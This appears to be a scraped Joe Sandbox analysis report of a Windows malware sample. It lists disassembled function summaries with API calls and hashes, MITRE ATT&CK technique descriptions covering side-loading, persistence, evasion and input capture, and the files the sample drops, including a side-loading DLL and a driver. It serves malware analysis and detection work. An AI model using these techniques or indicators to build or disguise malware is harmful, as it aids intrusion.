Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
String ID:
API String ID: 979337279-0
Opcode ID: 712b1e904f6e4d0383e7727b2f33d30807bb577d3dd978a7f5c4fdc3036bab30
Instruction ID: 5e05bcaf8d31bee9484100764973438d6b52e4255401e2b0d7790262b8158ad4
Opcode Fuzzy Hash: 712b1e904f6e4d0383e7727b2f33d30807bb577d3dd978a7f5c4fdc3036bab30
Instruction Fuzzy Hash: 2F31F434A00618EFEB14EF59C980E9DB7F5FF48228B6645A5E804AB321D731FE44DB50

Uniqueness

Uniqueness Score: -1.00%

Function 040CD6E2 Relevance: 6.1, APIs: 4, Instructions: 70threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 040CD6EF
GetCurrentThreadId.KERNEL32 ref: 040CD6FE
RtlEnterCriticalSection.NTDLL(0414A2EC), ref: 040CD743
InterlockedExchange.KERNEL32(0411AAF0,?), ref: 040CD75F

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: CurrentThread$CriticalEnterExchangeInterlockedSection
String ID:
API String ID: 2380408948-0
Opcode ID: 05ebcdcd7160c909fd92f3e0555eec053f3d21db616de716bb099503175e5e7d
Instruction ID: 6e144e97af80ed2b780f0f57276db6690425f646ec6e695e659f54b21679ae07
Opcode Fuzzy Hash: 05ebcdcd7160c909fd92f3e0555eec053f3d21db616de716bb099503175e5e7d
Instruction Fuzzy Hash: 69218330A44244EFEB11DBA4C894FADB7E8DF05308F518978E840F6690E779B954DF52

Uniqueness

Uniqueness Score: -1.00%

Function 04100E38 Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(00000000,000000EC), ref: 04100E6C
SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 04100E9E
SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,040FE59C), ref: 04100ED7
SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 04100EF0

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 168a2b39845428b87b0709f9930ed6b4815906412058b50200a3e27fca0d479a
Instruction ID: 24001cb60010fecec3ef8146be46b7cd7188dca9b905f791be62a1163d1adf7c
Opcode Fuzzy Hash: 168a2b39845428b87b0709f9930ed6b4815906412058b50200a3e27fca0d479a
Instruction Fuzzy Hash: 85110670A0825067EF51AB789CC4BD62A8C4B0931CF0885F0B995FF1C6CBA8FD48DB60

Uniqueness

Uniqueness Score: -1.00%

Function 040EA024 Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?), ref: 040EA039
MulDiv.KERNEL32(?), ref: 040EA056
MulDiv.KERNEL32(?), ref: 040EA073
MulDiv.KERNEL32(?), ref: 040EA090

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 252c6770106a75361df70907076199b145203d4218c02a64cf2bf0741655b85d
Instruction ID: 0d42edf934e5e09310d0bd29e890b753bd12b06edbb415170880729daed1829a
Opcode Fuzzy Hash: 252c6770106a75361df70907076199b145203d4218c02a64cf2bf0741655b85d
Instruction Fuzzy Hash: FE014F2130420C6F9774BD375C44FFB3A9DDFC5758B008478A82DAB342DA66FC2586A8

Uniqueness

Uniqueness Score: -1.00%

Function 040CA27C Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,?), ref: 040CA293
LoadResource.KERNEL32(?,040CA318,?,?,?,040C5D70,?,00000001,00000000,?,040CA1BE,00000000,?), ref: 040CA2AD
SizeofResource.KERNEL32(?,040CA318,?,040CA318,?,?,?,040C5D70,?,00000001,00000000,?,040CA1BE,00000000,?), ref: 040CA2C7
LockResource.KERNEL32(040C9E88,00000000,?,040CA318,?,040CA318,?,?,?,040C5D70,?,00000001,00000000,?,040CA1BE,00000000), ref: 040CA2D1

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 28e7e119e039b25beda35739a3405b35bb29ee27f4b5ad7a1bbed113ed856bf2
Instruction ID: 476f800cc7934d2134a0eb2a61672d1ff730ba21b10906df891eb129ef33d5cd
Opcode Fuzzy Hash: 28e7e119e039b25beda35739a3405b35bb29ee27f4b5ad7a1bbed113ed856bf2
Instruction Fuzzy Hash: 05F06273604118AF6745EF6CA840DDF73ECEE882683104459FD08E7205DA36ED0187B5

Uniqueness

Uniqueness Score: -1.00%

Function 04102570 Relevance: 6.0, APIs: 4, Instructions: 25synchronizationthreadCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(0414A748,0414A74C,04104D8A), ref: 0410259A
GetCurrentThreadId.KERNEL32 ref: 0410259F
WaitForSingleObject.KERNEL32(0414A750,000000FF,0414A748,04104D8A), ref: 041025B4
CloseHandle.KERNEL32(0414A750,0414A748,04104D8A), ref: 041025BF

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: CloseCurrentEventHandleObjectSingleThreadWait
String ID:
API String ID: 2257156048-0
Opcode ID: 2d5fc5572858bb316ebbec5571fa914dc7f24359a9fe48a419578b0ecb191f9e
Instruction ID: 3fe531bb1ba5eb39c8ada2c42d998e6d5e6d74aedfc35ffcc08fc1a1e14b8e73
Opcode Fuzzy Hash: 2d5fc5572858bb316ebbec5571fa914dc7f24359a9fe48a419578b0ecb191f9e
Instruction Fuzzy Hash: 8DF01C795802409FEB34EFBAD488AD537F4EB8424AB064A64A144D3580C77EFC80CF56

Uniqueness

Uniqueness Score: -1.00%

Function 040D21F8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 172COMMON

Download Yara Rule

APIs

Part of subcall function 040D14D8: RtlEnterCriticalSection.NTDLL(?), ref: 040D14DC

CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000,Default,00000000,040D23EC,?,00000000,040D2414), ref: 040D2327
CreateFontIndirectA.GDI32(?), ref: 040D23C9

Strings

Default, xrefs: 040D22EE, 040D22FC, 040D22FD

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: CompareCreateCriticalEnterFontIndirectSectionString
String ID: Default
API String ID: 249151401-753088835
Opcode ID: fbc57379016c543b530d92ae2f1d8aa61118a2b7da01f5abbefa64beea0d2f16
Instruction ID: 86db676d76df9fcbb00bff2ba49dfa5fb451387e84e1c53e1a32c66df6fcc900
Opcode Fuzzy Hash: fbc57379016c543b530d92ae2f1d8aa61118a2b7da01f5abbefa64beea0d2f16
Instruction Fuzzy Hash: 1C615D30A04348DFEB11DFA8C540BDDBBF5AF49308F1544A9E840B7252D774AE49DB6A

Uniqueness

Uniqueness Score: -1.00%

Function 040B1D08 Relevance: 5.3, APIs: 4, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d96af0684b0d16f00a178be335c228fbac4cb6f015479f48098843f005a0d9c1
Instruction ID: 5741fd69ab4ca20fc7b242a5a4d8fc337348d4ea0f1ffbf7538c75ffa766cd3a
Opcode Fuzzy Hash: d96af0684b0d16f00a178be335c228fbac4cb6f015479f48098843f005a0d9c1
Instruction Fuzzy Hash: 43A11A767106004BE718AA7C9CA43ED73D1DBC53A5F28427ED194EF381EB68E94583D8

Uniqueness

Uniqueness Score: -1.00%

Function 040BA5EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,040BA6DA), ref: 040BA672
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,040BA6DA), ref: 040BA678

Strings

yyyy, xrefs: 040BA64D

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: b1c3756a9c1614bc112e41cc0670d4ed8bc6e4c525bc5859a084b31f7ac00ca0
Instruction ID: 34e211ecf79c54da499e42881c35339669712c53654e36e879695eebda25d7aa
Opcode Fuzzy Hash: b1c3756a9c1614bc112e41cc0670d4ed8bc6e4c525bc5859a084b31f7ac00ca0
Instruction Fuzzy Hash: FE216FB5A002189FEB11DF64C841AEEB3F8EF08714F4144A5E985F7251E634AE40CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 040B36D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?), ref: 040B373B

Strings

FPUMaskValue, xrefs: 040B371C
SOFTWARE\Borland\Delphi\RTL, xrefs: 040B36E8

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Close
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3535843008-4173385793
Opcode ID: 2cee56e0dc243e789af58d5a9fc94b4fcb5e1de788b98cf61afe95fe61624562
Instruction ID: f52d12d2f923c9054c72fec30dd84294b2ef9eb30852384febde6f2b66e36008
Opcode Fuzzy Hash: 2cee56e0dc243e789af58d5a9fc94b4fcb5e1de788b98cf61afe95fe61624562
Instruction Fuzzy Hash: 53019675980348BAEB11DB918D42FED77FCDB08B04F6000A2BE40EA580E6797910C798

Uniqueness

Uniqueness Score: -1.00%

Function 040DAE10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 040DAE61
GetSystemMetrics.USER32(00000001), ref: 040DAE6D

Part of subcall function 040DACA4: GetProcAddress.KERNEL32(0414A568,00000000), ref: 040DAD23

Strings

MonitorFromRect, xrefs: 040DAE25

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: MetricsSystem$AddressProc
String ID: MonitorFromRect
API String ID: 1792783759-4033241945
Opcode ID: 523c40c7f59da7a684187b2cb1d97d0b84128d600c6d0944006d6beb1dc7b1ce
Instruction ID: 6991bd15e7af51451d5ec019b3cdc436c859aaf62671cf43ce2abe3f1043ab30
Opcode Fuzzy Hash: 523c40c7f59da7a684187b2cb1d97d0b84128d600c6d0944006d6beb1dc7b1ce
Instruction Fuzzy Hash: FC016236340314ABEB508E15D684B56B7A9DB84399F058551E905EF101C378EC88CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 040DAD88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(?), ref: 040DADEA

Part of subcall function 040DACA4: GetProcAddress.KERNEL32(0414A568,00000000), ref: 040DAD23

GetSystemMetrics.USER32(?), ref: 040DADB0

Strings

GetSystemMetrics, xrefs: 040DAD98

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: MetricsSystem$AddressProc
String ID: GetSystemMetrics
API String ID: 1792783759-96882338
Opcode ID: 3c86b561ef8c5f1422d8cabbc532b3a0c075504280d7182f427cdffa81dc2cb8
Instruction ID: 6745d9fe7f8f53322bc1f6c632a4ca174b0e2bfc40cd3273aec627edcfba952e
Opcode Fuzzy Hash: 3c86b561ef8c5f1422d8cabbc532b3a0c075504280d7182f427cdffa81dc2cb8
Instruction Fuzzy Hash: 36F0F0703503004FDB108A38DA8426A35A5EB8523AF404B21B2536E1C0E2BDB98DDE11

Uniqueness

Uniqueness Score: -1.00%

Function 040E31E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000010), ref: 040E3203
GetKeyState.USER32(00000011), ref: 040E3214

Strings

, xrefs: 040E3223

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: State
String ID:
API String ID: 1649606143-3916222277
Opcode ID: e8b94229468f08648c098670f5d6776d8ac0e1124f50fdf48a83691f03f9fb1a
Instruction ID: 389554f70dc1415f1f41115d3fd4068e8afdcabab0474f2bb0923e4cda77f0fd
Opcode Fuzzy Hash: e8b94229468f08648c098670f5d6776d8ac0e1124f50fdf48a83691f03f9fb1a
Instruction Fuzzy Hash: 04E09232700B4526F61279A92C003F75BD14F937ACF0846AEFED43B1D2E5A6292191A9

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report qDKTsL1y44.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Finqiaev.url

C:\Users\Public\Libraries\Finqiaev.PIF

C:\Users\Public\Libraries\FinqiaevO.bat

C:\Users\Public\Libraries\KDECO.bat

C:\Users\Public\Libraries\Null

C:\Users\Public\Libraries\easinvoker.exe

C:\Users\Public\Libraries\netutils.dll

C:\Users\Public\Libraries\truesight.sys

C:\Users\Public\Libraries\veaiqniF.pif

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
qDKTsL1y44.exe

Function 04207E4C Relevance: 43.5, APIs: 8, Strings: 16, Instructions: 1478
nativethreadprocessCOMMON

Function 041E5DDC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Function 041FFD38 Relevance: 12.1, APIs: 8, Instructions: 65
librarynativeloaderCOMMON

Function 041FFCD8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40
librarynativeloaderCOMMON

Function 041FFB7E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24
librarymemorynativeCOMMON

Function 041FFB80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
librarymemorynativeCOMMON

Function 0423B768 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

